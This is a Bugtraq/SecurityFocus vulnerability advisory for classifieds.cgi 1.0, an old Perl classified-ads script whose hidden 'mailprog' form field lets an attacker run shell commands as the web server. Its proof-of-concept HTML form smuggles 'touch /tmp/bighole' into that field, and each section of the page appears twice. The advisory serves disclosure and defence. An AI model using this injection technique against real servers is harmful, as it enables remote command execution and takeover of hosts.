Greg Matthews Classifieds.cgi Hidden Variable Vulnerability
BID:2019
Info
Greg Matthews Classifieds.cgi Hidden Variable Vulnerability
| Bugtraq ID: | 2019 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Dec 15 1998 12:00AM |
| Updated: | Dec 15 1998 12:00AM |
| Credit: | Credit for discovery is not currently known. |
| Vulnerable: |
Greg Matthews Classifieds.cgi 1.0 |
| Not Vulnerable: | |
Discussion
Greg Matthews Classifieds.cgi Hidden Variable Vulnerability
Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to execute any command on the host machine, with the privileges of the web server. If the attacker can submit a command to run as a hidden variable that command will be executed. Normally this variable is reserved for the mail program and is accessed from an HTML page with the following piece of code: <input type="hidden" name="mailprog" value="/usr/sbin/sendmail">
Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to execute any command on the host machine, with the privileges of the web server. If the attacker can submit a command to run as a hidden variable that command will be executed. Normally this variable is reserved for the mail program and is accessed from an HTML page with the following piece of code: <input type="hidden" name="mailprog" value="/usr/sbin/sendmail">
Exploit / POC
Greg Matthews Classifieds.cgi Hidden Variable Vulnerability
<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="[email protected]">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?
</form>
<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="[email protected]">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?
</form>
Solution / Fix
Greg Matthews Classifieds.cgi Hidden Variable Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Greg Matthews Classifieds.cgi Hidden Variable Vulnerability
References:
References: